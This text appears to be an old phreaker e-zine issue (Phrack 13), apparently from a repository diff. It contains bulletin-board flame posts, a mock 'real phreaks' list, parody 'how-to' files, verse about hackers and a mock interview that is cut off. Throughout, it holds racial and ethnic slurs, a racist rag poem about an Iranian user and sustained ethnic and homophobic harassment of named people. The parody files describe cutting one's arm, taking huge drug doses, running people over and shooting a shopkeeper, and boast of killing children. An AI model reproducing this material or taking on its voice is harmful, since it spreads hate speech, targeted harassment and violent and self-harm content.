If all goes well, there'll be a K-K00L Ragging Subboard, and you people can
just go there and tell the other person how k-radical you are, what a stud,
how good looking, and what an asshole, loozer, rodent the other person is. I
think most of the other users, along with myself, are getting quite sick of
all of this...After all: This *IS* the Phrack/Gossip board, right? Yeah...
[%] The Yakuza [%]
Name: >UNKNOWN<
Date: <-> INACTIVE <->
What the HELL does your looks have to do with this, Exy? It doesn't matter how
'great' looking you are, because the board wasn't put up so you could tell us
how much of a ladies man you are. If you want to brag, put up your own board.
And since your messages are directed to one person, USE THE FUCKING EMAIL
COMMAND! thats what its there for.
Some people..
Name: The Executioner #47
Date: 10:31 am Sun Sep 14, 1986
Ass kissing? Please, spare me the vomit of your mouth huh bud? Taran says
something about ISDN and since I knew something about what he said, I decided
to expand it into an explanation which is definately not ass kissing. I don't
kiss anyone's ass because I dont have to. Taran does not delete me out of
mutual respect I have for him and I should think he has for me. Notice I don't
use low-level words like "fuck" and "shit" and all the other terms that people
with IQ's of a marble statue have. So Dr. Doom is a good friend of yours huh?
Probably your ONLY friend because both of you look like the Elephant Man....
"I'm Noooooooot an ANIMAL!!!", don't worry Doc, Paper bags are still in.
As for files, I have written my share, and really could care less whether or
not you can read or not. As for the PhoneLine Phantoms, we are not just a
telecom group, we are comprised of the 4 best looking, studliest people. When
I heard about Doom, I said, well, I dunno, we will have to reduce our image of
4 studs into 4 studs and 1 dud. As for playing with my male organ, you must
know more than I, considering you know all these nifty little sayings you must
have thought up when you were raping that coke bottle. As for calling Doom, I
call when I get a deep feeling of pity abnd decide to enlighten the poor
impoverished boy.
So, why don't you, Doom, Master Vax (Circuit Breaker) go and slither back into
your holes where you can fester and leave the REAL stuff to me and Culprit.
And if you really wanna take this issue far, I propose a challenge. I will
send my picture to an unbiased third party and you do the same. Then we will
see who is the REAL Sexy-Exy. Oh yeah, it's Mikey, not Mikie, and Exy, not
Exie, and I prefer a "Mr. Executioner, sir" before you speak to me. I will just
call you little peon...
-The Executioner
PhemalesLuv Phantoms!
PS: People who belong to something cool can post it, those who can't, don't.
Name: Taran King #1
Date: 11:00 am Sun Sep 14, 1986
PLP vs. Everyone has to stop, guys...at least on the phreak board. This is
for telecommunications only. If you really want, I can create a rag subboard
so you can bitch all you want, but it's getting a bit tedious out here. Exy,
I know you have quite a bit of knowledge hidden somewhere in your mind, I've
seen your philes, and they're decent. Dr. Doom, I know you pretty well, and I
thought the two philes I read were quite decent as well.
How about a bit of unity in the crumbling phreak world that we know today, huh?
It's already in shambles and people are getting totally bored of it, or are
being busted. Most of us on here have been around for at very least 6 months
so that says something about us...I know Exy wouldn't mind a rag board, because
he excells in it, but I'll leave the final decision to the users. Go V:ote
now, please, and stop posting rags...MORE INFO!!!
-TK
GETTING PISSED!
Name: Dr. Doom #106
Date: 5:48 pm Sun Sep 14, 1986
Well, I am going to change the discussion because I am quite (yawn...) tired
of this useless ragging. (By the way I drive a sports car, live in an
affluent neighborhood, and am not Polish but of English decent). OK, like I
was saying I am going to try to put a little life back into the Phreak World
with a new Electronic Journal. The Dr. Doom Journal of Telecommunications as
I call it will center around topics and techniques that have not been readily
discussed. Although I will be doing a lot of writing (because I like to), I am
looking for anyone else that might be interested in helping out. One of the
Departments will be like a mini-catalog of places where you can order all
sorts of cool stuph from that has to do with Telecom, etc... If you are
interested or even have some places to order things from, send me mail.
Later...
Dr. Doom
Name: Doc Holiday #19
Date: 11:59 pm Sat Sep 13, 1986
Well, since I have been away, I have noticed a few changes, but some things
will never change I guess. Executioner is the same fag he's always been. Big
deal, he has expanded his ragging capabilities all the way to Texas with
Dr. Doom, who happens to be a good friend of mine. I have one question for
you Mike, do you do anything else besides vegetate in front of your monitor
and write songs about people? You seemed to have a very good knowledge of the
content of the "Hillbillies" song. I guess that shows your level of intellect.
I really dislike ragging so this is probably the only post that will deal with
it. If you have something to say to me, call me, if you can get my number I
will be more than happy to toy around with you. You are shit. That is what I
get out of all of this. You rag on Dr. Doom's files but, have you ever written
a file with useful information in it? I seriously doubt it. Some of Doom's
files are so-so because I already know a lot of it, but many of his articles
are actually quite informative. Have you even read any of them?
Also, why is it that you call him quite often every day? Have you ever left
your house or anything besides to ride the little school bus to get to school?
That is very doubtful also. Taran, why don't you just get rid of this nusance?
Is he some sort of threat to you? Anyway, Exie, about your brown-nosing, I see
all of these rag posts of yours, then Taran posts something on ISDN and then
you immediately post something on the topic, afterwhich you go back to ragging.
If that isn't ass-kissing then explain to me what is.
What about PLP, why do you even bother to exist? I am speaking mainly to
Carrier Culprit and The Executioner. I remember being on three-way with CC
and someone else whom I won't name, and listening to him say things about me.
I have never even talked to the person before. Then when I got on the line and
talked with him, he didn't know anything. I would ask about general telecom
topics and he would say "I'm sorry, I don't know much about the phone network,
I hack mostly", then I would ask something about hacking and he
co-oincidentally couldn't remember his way around those systems very well
because they weren't that important. Did someone mention DEC? They are a
really nice company. I am involved with them quite often. I even use a DEC
terminal to call places instead of a computer. The Executioner probably thinks
a DEC is something you play with every night before you go }to bed, because of
his personal experiences. He is a DEC (w)hacker, but anyways, I think I have
made my point.
Doc Holiday
PS: Notice no fancy shit under name...sorry, but I don't take ego trips during
the off season.
Name: The Executioner
Date: 2:57 pm Tue Sep 23, 1986
^ ^
/ + \ / + \
/*TBC*\ /*TBC*\
|=====|__________________________________|=====|
| | | |
||||||| The Executioner & Egyptian Lover |||||||
|-----| -------------------------------- |-----|
| Rag | | The Breakfast Club | | Rag |
|Files| -------------------------------- |Files|
################################################
% %
% Presenting: Rag Volume Four %
% ---------------------------- %
%%%%%%%%%%%| /\/\/\/\/\/\/\/\/\/\/\/\ |%%%%%%%%%
| Arthur Dent: Third World Iranian |
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
There's this kid called Arthur Dent,
He's got no money, not one red cent.
Cool and Slick is what he wants to be,
He even wants to be a part of LOD!
His mother country, he calls Iran,
He cleans camel stalls like no one can.
All he wants, is to hang around with phreaks,
But there's a law against third world geeks.
It says: "Get out of my country, get outta my land,
Go back to your people who make houses out of sand."
Pack your bags and be on your way,
We don't want you 'cuz you're all gay.
You think you're cool 'cuz you can hack,
I hate to tell you this, but bud you're wack.
I saw your picture and boy are you lame,
From under a rock is where I think you came.
You cry "Hey Phucked agent, please teach me!"
You annoy the poor man, don't you see?
You try to impress everyone in sight,
One look at you and we run in fright.
Ain't it funny how your temper does fume,
When I say I'm in the Legion of Doom.
With a cardiac arrest, you get all hyper,
In case you piss in your pants, here's a diaper.
Now, don't get mad from this little ol' rag,
Just cover your face with a grocery bag.
With a towel on your head you do declare,
"Allah gimme a real life and real hair."
Well, my iranian friend, I am done,
I hope you don't mind me having some fun.
=============================================================
The above is a rag I wrote a while back, I got alot of good feedback from it so
I'd thought I'd have an encore presentation.
The Executioner
Name: The Executioner
Date: 4:53 pm Sun Oct 12, 1986
Anyway, as to Quest, that little nuisance thinks he has a real bbs and he
thinks just because I let him talk to me for 5 minutes he's my best friend.
Frankly, I'd axe him just because he shows no sign of any capable action short
of maybe masturbating his dog into a bowl of frozen tofu.
Ciao
Sexy
Name: Arthur Dent
Date: 11:06 pm Mon Oct 13, 1986
You mean PINK tofu, I think. Read read the last message if you haven't the
slightest
dent
Name: Knight Lightning
Date: 10:46 pm Sun Nov 23, 1986
PLP Three-Way Con:
Rich: Hey Mike the board is going great!
Mike: Thats good, any new users today?
Rich: A few, I haven't validated them yet...
Eric: Ho hum...
Mike: Lets call some now and check them out.
Rich: Ok, hold on...
Eric: No Rich wait wait...
Rich: I'm going to click over to three way.
Eric: NO! Wait wait Rich hold on.
Rich: I'm Going toCLICK on my three way hold on!
Mike: Whats your problem Eric?
Eric: Wait Rich, will you just wait a minute!
Rich: Ok!? What!?
Eric: Rich, (pause) You're gey!
Mike: Eric, you are the Wack!
Eric: Shut up Mike!
Mike: What? Hello, hello did you say something? Hello hello?
Eric: Dag!
:Knight Lightning
From: SHERLOCK HOLMES
Date: MON FEB 16 9:04:17 PM
On a recent visit to The Iron Curtain, (I think that was the one).. well it was
my first time on and they were talking about stuph like newsletters and things
like that.. one post said something like this:
"Okay... I know you guys have heard of TAP and 2600, well there is a new
phreak/hack newsletter. It's called Phrack [Please note that by this time
Phrack X was already well underway and being distributed] try and get a file in
it. Phrack is all these files. It looks really good. I would try to get a
file in there to impress your friends."
Sherlock
From: DOOM PROPHET
Date: MON FEB 16 9:56:08 PM
I think common sense should be used by the authors and editors of newsletters
that get around, that is, not to overplay or exaggerate anything concerning
someone's feats, or knowingly print invalid information while keeping the real
information for themselves. Of course, if the whole newsletter writing
population (of which I am a part) started churning out idiotic files about
idiotic things, then maybe the security people and rich business pigs would
dismiss us as dumb kids.
Example:
!@#$%^&*()_+!@#$%^&*()_!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()+_!$#!
HOW TO DISCONNECT SOMEONE'S LINE
By KODE KID 100
0k d00dz, just g0 t0 the f0ne line where it cumes out of the house and pull on
it as hard as you can. Then, the loze has his line disconnected until AT&T
Repair service soldiers come to fix it.
L8r111
K0DE KID 1OO
-The Marauders
PS: Call Digit/\|_ ITS *ELITE*,tonz of k0dez 4 *REAL* hackers!
!$#@!!$^%$#&^%*^&(*^(&)(*___++((*_)&+(%^$%^#%$%$@%#$#%^#^%&#$^%&&%?<<?$&@#$%!@!
78/81: A New Mod..
From: THE LINEMAN
Date: MON MAR 09 2:05:25 AM
I have an idea for a mod that will save the users a hell of a lot of time.
Howabout put an IF THEN statement when you are saving the message so that if
the name is "ORYAN QUEST" then it won't save then we won't get rodenty G-File
posts anymore. Sound good?
ciao
The Lineman
77/77: TMC...
From: MARK TABAS
Date: SAT MAR 14 12:05:38 AM
I heard that if you crank a TMC code through the DES algorithm, and then
through the Cristensen CRC-16 algorithm, followed by complementing its
packed binary value and then encrypt it to "kl.LLL.hyuuuu" using the German
enigma, you'll get a COSMOS dialup!
Does anyone know if this works??????
tabas
_______________________________________________________________________________
Well thats it, but before we go, here is a quick look at the vote section of
Metal Shop Private:
Question #3: Should Oryan Quest be let back on?
Users voting: 8.7%
0:No Comment
1:No. : 3 50.0%
2:No. : 1 16.7%
3:No. : 0 0.0%
4:No. : 1 16.7%
5:No. : 0 0.0%
6:No. : 0 0.0%
7:No. : 0 0.0%
8:No. : 0 0.0%
9:No. : 1 16.7%
Your vote: No Comment
Change it? Yes
Which number (0-9) ? 1
Current Standings: Should Oryan Quest be let back on?
Users voting: 10.1%
1:No. : 4 57.1%
2:No. : 1 14.3%
3:No. : 0 0.0%
4:No. : 1 14.3%
5:No. : 0 0.0%
6:No. : 0 0.0%
7:No. : 0 0.0%
8:No. : 0 0.0%
9:No. : 1 14.3%
Majority of Posts Taken From Metal Shop Private
Some Posts Taken From The Lost City Of Atlantis
_______________________________________________________________________________

129
phrack13/2.txt Normal file
View file

@ -0,0 +1,129 @@
==Phrack Inc.==
Volume Two, Issue 13, Phile #2 of 10
_-><-_==_{[The REAL Phreaker's Guide Part II]}_==_-><-_
or
How To/Not To Be Elite!
Written by
Taran King and Knight Lightning
So, you're willing to give up EVERYTHING to be elite, huh? Well,
you've come to the right place. We know from EXPERIENCE. We know FIRST HAND.
We know because we ARE ELITE (not elite, ELITE).
Some of you may recall our first version of this file which was
released years ago. That was when we were young and immature. We are now
much more mature and ELITE and you aren't so there. Here's the file, learn
it, love it, live it, leach it.
!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^
Real phreaks don't utilize anything pertaining to phreaking/hacking in their
handles (Phantom PHREAKER, CODES Master, CODE Manipulator, Bill from RNOC,
Perpetual PHREAK, Luke VAXHACKER, VMS Consultant, Holophax PHREAKER,
Ubiquitous HACKER, Dr. HACK, PHREAKY Floyd, Broadway HACKER, The Mad HACKER,
The PHREAKazoid, PHREAKenstein, Dan The OPERATOR, and ORYAN QUEST).
Corollary: Real phreaks or hackers don't have ORYAN QUEST in their name.
Real phreaks don't get in trouble when people harass their parents (Phucked
Agent 04, The Executioner, and Oryan Quest).
Corollary: Real phreaks don't name themselves Oryan Quest if they know that
they're going to receive harassing phone calls.
Real phreaks don't look like celebrities (Mark Tabas - Tom Petty, Shooting
Shark - Mork from Ork, Telenet Bob - Danny Partridge (200 pounds later), John
Draper - Marty Feldman in Young Frankenstein, The Executioner - All of the
group members of Loudness, Broadway Hacker/The Whacko Cracko Bros. - Tommy
Flenagan, Mr. Zenith's mother - Fred Sanford, The Lineman - Spanky, Sigmund
Fraud - The Great Pumpkin, and Oryan Quest - the Mexican cab driver in D.C.
Cab).
Corollary: Real phreaks didn't crawl under a fence to become a citizen of the
United States of America.
Real phreaks don't go to Tap (Dead Lord, Cheshire Catalyst, Sid Platt, and
Oryan Quest).
Corollary: Real phreaks don't piss Taran King off so that they would get a
rag file dedicated to them.
Real phreaks don't name their group after a real phreak (New religion:
Luthorian.)
Real phreaks don't get busted and come back numerous times (The Whacko Cracko
Bros., Dr. Who, Mark Tabas, Holophax Phreaker, and Oryan Quest).
Real phreaks don't get kicked out of the FBI (Ahem!).
Real phreaks can't speak 2600 in their normal, everyday voice (Ax Murderer,
The Wizard, The Preacher, and Oryan Quest).
Real phreaks don't have busha-bushas (Eric Corley, John Maxfield, The Bootleg,
and not Oryan Quest's mother).
Real phreaks aren't religious fanatics (The Preacher, The Pope, The Exorcist,
Magnetic Pope, All Members of Cult of the Dead Cow, Mr. Zenith's mom, The
Prophet, Lucifer 666, Angel of Destiny, and Satan [Oh, and Oryan Quest]).
Real phreaks don't use vaseline for mousse (Oryan Quest).
Real phreaks don't eat tacos for breakfast, burritos for lunch, and
enchilladas for dinner (Oryan Quest).
Corollary: Real phreaks don't need to get the cheese for their Mexican dinner
from the government (Oryan Quest).
Real phreaks don't claim to get busted 3 times to make a good reputation as a
phreaker or hacker for themselves (Oryan Quest).
Real phreaks don't answer to "Paco" (Oryan Quest).
Real phreaks don't use Maintenance Busy in an effort to unleash with full
force (Oryan Quest).
Real phreaks can rag on better things than an individual's mom (Oryan Quest).
Real phreaks' caps lock didn't get stuck when signing their first message
after they typed their first name (Oryan QUEST).
Real phreaks don't claim to know more than 65% of the phreak world (Oryan
Quest).
Real phreaks don't have a girlfriend that needs to shave...their face (Oryan
Quest).
Real phreaks haven't been around for 4 years without accomplishing something
(Oryan Quest).
Real phreaks CAN'T argue with their parents in Spanish (Oryan Quest).
Real phreaks don't:
Cash $5,000,000 checks.
Card minicomputers.
Card gold.
Get busted for hacking but let off due to police brutality (?!?).
Write books on the topic.
Say they're from outside of Illinois when working for Illinois Bell.
!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^
You, the reader, must understand that this is all written with the
very least in seriousness (except that written about Oryan Quest). Anything
contained in the file is just poking fun at people without trying to really
make them feel bad (except for Oryan Quest).
To the various people that have contributed various pieces and bits
to this file, we wish to extend great thanks for your innovativeness (or lack
thereof).
Now, you too, can be ELITE.
!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^&*()_+!@#$%^

139
phrack13/3.txt Normal file
View file

@ -0,0 +1,139 @@
==Phrack Inc.==
Volume Two, Issue 13, Phile #3 of 10
/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\
\|/ How to fuck up the world \|/
/|\ Writen 10:03 pm December 2nd 1986 /|\
\|/ by the Neon Knights and Metal Communications \|/
/|\ Thanx to the Metallain,Zandar Zan,Marlbro Reds,ACID,The High Lord /|\
\|/ Satan,Apple Maniac,The Necrophiliac&The Necrophobic (for theri awesome\|/
/|\ dox-file skils),SLayer,Megadeth,Overkill,Samhain,The Misfits (fuck yea/|\
\|/ Hi Glenn!),The Blade,Killer Kurt,and Steve Wozniak even thouhg hes a \|/
/|\ wimp! /|\
\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/
/|\ Fuck off all niggers jews commusnists retarted /|\
\|/ arabians peopel who dont own computers and any welfare starving shit \|/
/|\ headed bastard who doesnt have an Applecat modem! /|\
\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/
/|\ Im not even going to write a list of boards for you to call. Well /|\
\|/ what the fuck I guess I will put at least one..... \|/
/|\ Call the Metal AE (201)-(879)-(666)-(8) for the latest in Neon /|\
\|/ Knights wares and for a cool board/cool sysop/cool wares/just all \|/
/|\ around cool! /|\
\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/
The Phile itself:
When your like me and get bored eassily its veryt hard to keep fuctiong the way
your parents expet you to. I would go out with Killer Kurt all the time and dest
roy evrything we coiuld find that looked stupid,get drunk off my ass,trip on aci
d(like im doing righ now),use the necronimiconm to summon a watcher to kill my t
eachewrs my douchbag bratty sister and the fat sickining son of a bitch that liv
es next door to me,and my parents would very rarely do anything to try to stop m
e. i gues they just thought i was goin throuhg a phase or sometihg like that. We
ll I finalyl hit upon the perfect combination of things to do that not only get
your parents to reac, the are a hell of a lot of fun and cause so much evil, cha
os, and havoc that Satan will be sure to reservbe a good seat in Hell for you. S
o now Here are step by stpe instructins on HOW TO FUCK UP THE WORLD
Step one:Get.a large supply fo plastics garbage bags, gas or other very flammabl
le shit,and a flamsthrower or somet other way to light fires from a distance (ju
st to make sure you dont die yourself before your ready).Also i forgot to mentio
n,take a good amount of drugs befoere you start doin this so youll be able to fi
nish what you start.I reccommend about three hits of blotter acid (4way album co
ver is best,thats what i use),about 2 grams of weed (smoked),some mescaline if y
ou can get it (arizona is a great place to pick it yourself),and of course the g
ood old american tradition of JACK DANIELS. Most people mix this with coke but I
have invented a new way to do it,which ya do by mixing it with JOLT cola instead
. tHIS (godamn fuckin caps lock key) will get you really goin, you may want to
use some speed as well so you dont pass out and some ludes or other type of down
er just to keep you balancd well. now make sure you can still stand up (once you
get that far the rest will come naturaly) and get in yer pickup (if you dont hav
e a pickup there is no hope for ya!) and drive. Oh remember to take the gas, bag
s, and light with you.
Step two: Drive to a secluded area and preparew for your assault on the armies o
f the conformist bastards. What your gonna be doin here is summoning a demon. Th
is is one of the waeker types according to the Necromnicon so you can control it
easily in your druged state but powerful enouhg to actually be of use to ya. So
draw yer pentagram on the ground,get a Slayer tapepl aying (no motley crue!!! or
the demon will laugh its ass off at you before killing you and eating your soul.
Adn thats a big waste of time not to mention no fun at all.) set candles at all
cardinal points and cut a long incision down the lenght of your arm about frmo
mid-bicep to just before your wrist as you dont want to bleed to death,just enou
gh to get about 3/4 of a pint or so. Drip all this blood inside the pent.,and ch
ant the following:
"YOGGIH PPEDRILS, STOWART EHNTAHL SHILGLI DRAGGULS UOHT!"
Say this5 times and you shoukld noteice the candles flikckering (hmm i blieve th
e rrUSH is starting to come on nwo, this sucker relly was worht 40 a sheet!!)! B
y the way that shit up there that ya say is not nay kind of backjwards bullshit,
it is the real stuff. I paid 40 bux for my copy of the youknowwhat so i oughtta
know. now where was i o yeah. Onece the damn thing appears thjen you gotta estab
lish control over it real qiock before it start getting any ideas. by the way in
caser you wodering what it will look like it is a big motherfucker approx. 20 fe
eet tall with green leathery sking. If you get the wrong one it doesnt really ma
tter that much anywayt since youll be dyin soon but it helps. so now get it to f
ly along above yer truck (tell it to be invisible so ya dont have peopl starin a
t ya!) and drive back to whereever it is that your gonna destroy.
Step three: stop back at yer house wreal quick and pick up the follwng. If you d
ont have all this at house then just go by a hardware storte and a drugstore and
picjk it up. if the owner objkects then just take out his kneecaps with your cro
wbar and he wont be goin anywhere for a long time.
30 dozen hammers
50 gallons of paint (asorted colors is nice but not necesary)
(jesus this is weird, have any of you ever seen ther letters on yer screen wiggl
ing and boucing didnt think so!!) now where was i/
5-10 tanks of propane
100+ gallons of gas (for a seperate use than the gas i alreadyu mentiond)
from the drugstore,or your closet if your like me and keep a constant supply of
every kind of drug ever made):
1,000 doses of pseudoephedrine (there we go,i spelled it right! well ive got the
catalog next to me so fuck it anyway,it doesnt mean shit.neuither does your mama
. i think im getting off track - wel then again it is kind og amazing cause my
ingers are twichin so bad)
5,000 doses of LSD
250 doses of qualudes
600 cases of JACK DANIELS
ok now for the good part. Consume all of these yourself! HAAHAHA! i bet you thou
ght you were suposed to put them in the citys water supply or soething! but now
you better get moving cause this is all gonna take effect within the hour! but i
f ya wanna save some to put in the citywater then go ahead,you wont have quite a
s much fun but who the fuck am i to tell you exactly how to do things.
Step four: Drive to the heart of the city. on the way see how many little old la
dies and fag poodles ya can hit. When ya get to the talest building in town smas
h into a fire hydrant in front of it. now get out and run like a bitch *just hav
e the demon carry all the shit for ya*! and go to the FUCKEN TOP of the building
. here is where you do all this.
Make the demon inhale all the propane, and give him the smaler amount of gas (th
e one I talked about first..go back about 70 lins or so./) to drionk. Now hes al
l set. now YOU have to get on his back. make him carry the hammers and paint and
the largetr amount of gas. Have him take off and fly all over the city aas he fl
ys just throw hammers down at building windows and people and paint at both of t
hose too! Now i bet you thinking i forgot all about those garbage bags and the f
lamethrowr. Hell no i didnt! with the little bit of propane hes got left have hi
m blow up the bags so they make a giant baloon. now you take the big amount of g
as and drink it (after all those other drugs it should be a smnap!) and jump. Wi
th your weight off him and all that propane in him and with that baloon he will
instantly take off straight up into heaven, where he will cause some wicked shit
to happen! As for you, you will fly down and hit the ground, and be goin so fast
that you go right through all the way to Hell. Once you get there all the gas in
you will ingite and BOOM! Satan will be proud of you for sure! a perfect ending
to a perfect day!
/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\/|\
\|/ Keep those credits up there excatly as they are (inother words,puttin\|/
/|\ your K-K00l board up there WONT be tolerated!) or we will fuck you up. /|\
\|/ If ya dont believe us by now your retarted. -Killer Kurt \|/
/|\ -And the rest of the 'knights! /|\
\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\\|//|\
/|\ Copywrit 1986 by Neon Knights/Metal Communications/ /|\
\|/ Black Death/No Love \|/
/|\ We're rad...we kill children! /|\
\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/\|/
Oh, and by the way, the above file was a parody by UrLord, Thomas Covenant.

133
phrack13/4.txt Normal file
View file

@ -0,0 +1,133 @@
==Phrack Inc.==
Volume Two, Issue 13, Phile #4 of 10
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/|\ the Neon Fucken Knights /|\
\|/ present with no alternative \|/
/|\HOW TO BUILD A PAISLEY BOX! /|\
\|/ by the fucked up Blade \|/
~~~~~~~~~~~~~~~~~~~~~
All right, so i mfucken in 40 cols..what's it matter? i just
realized that many idoits out ther still dont know how to make one of
the greatest anarchiust tools ever, the Paisley Box. This little
beauty will do just about anuyt6hing ya want, including:
--Seize operator lines
--Remote control over all TSPS and TOPS consols
--All other box functions combind in oine, includin blue, beige, and
blotto
so ya wanna know how to build this fucker and go out terrorizin ma
bell..well sit tight, we wont bother with any fucken diagrams cause
those are for dweebs (right necro? right!) here we go!
first of all get about 20 lbs of quality drugs and 3 or 4 kegs. you
might
think that you need this for the contruction of the box but, you don't
you take it all yerself!!
this will mellow ya out enuf to follow our planz. lessee, oh yea
parts list:
--about 50 ffeet of copper wier, hopfully insulated
--an old (prefer touchton) phone that ya dont need no more
--a honda genorateer (don't pay for it, just card it. right necro?
right!)
--and one of the empty kegs that ya drank to put it all in. the
genarater will fit fine and the rest ya can attach to the outsid if
thats your fucken urge.
now for tha actualy construciton details:
oh shit, we forgot one fuckin thing. go to you local hadware stoer and
find the guy who owns it, get a gun and blow his fuckin head off (you
can card the gun two) this isn't for the box but, it fun and it will
make satan happy so yor box will work better.
now with the empty keg and all the stuf we put up there ( i think
about 20 lins ofr so up )_ attach the genarater to all the other shit
however ya please, now get some nice paisley wallpaper from your mom
9(steal it if she wants it still) and put it all on the oputsid of teh
keg. you now have a 100% genuine Neon Knights approvd Paisley Box!
How touse:
hook that son of a bithc up to yir modem (thats only if you got a 212
cat. if you don't then you are an asshole anyway and the box will
blow you fucken house aprt but, satan will be happy.)
now turn yer dam computer on, and when the prkmpt comes up(
hardwird into the box of cors! whatdday think we are, stupid? )
type: 666 (space) SATAN RULES (space) MY SWEET SATAN!
then the menu will coume up on you screen and it will say.
1) fuck the operator around
2) take control of the pentagon
3) imitatte boxes (blue, blotto)
4) fuck-a-geek
choose whatever ya want, except if ya get tired of it and want to
trash th thing type 666 for a choice. the box will sef destructt, yer
computer will explod, anmd in its trahsing death throes speak an
chant taht will summon satan to take you away to the depths of
HELL!!!
use this masterpece proerly, and remember: NO FUCKEN LOSERS!
`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'
Call these genocidal systemz:
The Gatest of Hell 555-51325-634637-3
1200 ONLY DAMMIT!
Mephisto's Suicidal Nightmare 2436-234-666 (of course!)
1200 ONLY DAMMIT!
The Dead Fuckers Realm 2436-99-2309
300 only for now (dammit!)
sorry for the sloppy look compared to our usual k00l neat files, but my
computer got confiscate d by the fucke n pigs so i have to
telerwit this fucker usin a dumb terminal, until i card another!
should be within the week!
but don't forget to call the rad Metal AE
201-879-[666]8 9600 baud only (god fuckin dammit) 4 drives with 710
megs soon (we promise this time).
Kneon Nights "We're Rad, we kill children!!"
end of file
i said end of file dammit!
what are you still fucken readin for? hit escape you stupid
shithead!
if you dont fucken hit escape i will call satan on you!!!
fuck the dead!
***
***
***
***
***********
***********
***
***
Oral roberts is the anti-christ!!!
oh and remember: this has been a fucken parody from thomas fucken
covenant and double fucken helix. Call Thieve's World, the last
bastion of free thought: 616-344-2718.
"Whaddya mean I don't believe in God? ... I talk to him every day!"

128
phrack13/5.txt Normal file
View file

@ -0,0 +1,128 @@
==Phrack Inc.==
Volume Two, Issue 13, Phile #5 of 10
Phreaks In Verse!
-----------------
By
Sir Francis Drake And Aiken Drum
Welcome to this file,
We hope you will spend a while,
With us today.
Perhaps you will be enlightened, in a way.
This file is about phreaks,
And hacks. We have spent weeks
writing about people in verse.
You can pick who is worse,
Our poetry or them.
We mean no insult,
And we hope as a result
No on will kill us.
'Cause we wouldn't like that OK?
Shooting Shark
--------------
His name is Shark,
He thinks UNIX is a lark.
He can even log people out!
(The legality of this we doubt)
He looks like Robin Williams.
And maby he'll make millions
Writing UNIX software!
(Wolf will tell him what to wear.)
Oryan QUEST (Agent Orange)
--------------------------
Oh! Poor Oryan QUEST!
Many call him a pest.
"Stan", they cry,
"Why do you lie?"
The color of his car keeps changing,
Perhaps its because I'm aging,
But even if my brain is weak
I know he said his car was RED last week,
But today he said BLUE!
Tell me the truth Stan, please do.
But he knows quite a bit,
And if he dosn't throw a fit,
He can be an OK guy.
Lex Luthor
----------
His real name is funny,
(And it isn't Bunny)
But a joke he is not,
He knows a hell of alot.
Of phreaks, and hacks, and little blue box.
Hes head of LODH, a club that rocks.
He's a secretive guy,
But I think we all know why.
(He even made me change this poem,
Oh well. I owed him.)
And no he dosn't sound like Yogi Bear
No matter what Bill may dare
to say.
Knight Lightning
----------------
Knight Lighting likes dots, *'s, and slashes.
He sits at the CRT so long he gets rashes.
Making those NEAT title screens
Is the thrill of his teens!
But we all think he's a swell guy,
'Cause he gives everything a try.
Silver Spy
----------
Silver Spy!
He's a conservative guy.
He runs a elite BBS-- Catch-22.
It dosn't get many posts, boo-hoo.
But what other board can you see,
Limericks when you log on...tee-hee.
Bill From RNOC
--------------
Bill from RNOC
Is from New Yawrk.
Smarter than the average phreak,
His opinions are not meak.
He designs PBX's for fun,
But he needs to spend more time in the sun.
Soon you will see,
Bill working for NT. (*NT is Northern Telecom for you stupid people*)
Taran King
----------
What a terrific guy is Taran King,
Working on Phrack and runing MSP is his thing.
He's a bit redneckish;
(he won't admit he has a homosexual fetish.)
But of the phreak community he is a piller,
And without him we would wither.
And if I keep patting his back,
Maby he'll put this file in Prack.
----------
Oh no! I fear
The end of the file is here.
This file, about all these people who are ELITE,
Can be followed by one word...DELETE.
sfd

110
phrack13/6.txt Normal file
View file

@ -0,0 +1,110 @@
==Phrack Inc.==
Volume Two, Issue 13, Phile #6 of 10
R.A.G.
Rodents Are Gay
Starring Codes Master
Welcome to the first and last issue of R.A.G. This month we will feature a
nauseating article about this months feature idiot - Codes Master. Remember,
this file is not for you people with weak stomachs and parental discretion
is advised. Rated R (for rodent).
First, a little introduction. The purpose of R.A.G. is to seek out and
destroy potential idiots, assholes and posers. Obviously Codes fits into all
these catagorys. We obtained a taped interview with Codes at his home in
Mickey, Mississipi, and was able to get a few truths revealed. Here is a
small transcript of the interview. "ME" is the interviewer, "HIM" is Codes.
ME: Nice place you have here. I see your into art. Ah, thats an interesting
peice there. What do you call it?
HIM: Thanks. Thats called, "Mickey's Rat Trap". It shows the valiant Mickey
cleverly stealing the cheese from the trap without setting it off.
Actually, it was quite a bargain, and cost me mere $250.
ME: Thats interesting. You seem to have an obsession with Mickey Mouse and
other rodents (looking around I see portraits of Mighty Mouse, Jerry,
Speedy and others).
HIM: Its just one of my hobbys.
ME: Okay, anyway, on with the interview. We understand that you consider
yourself, and I quote, "an expert on Primos". But we have seen
conflicting views when it comes to the truth of this. Alot of people
seem to think you don't know anything, and what you do know has been
learned in a very short period of time. Is there any truth to this?
HIM: Uh, would you like something to drink? Some treats perhaps? I have
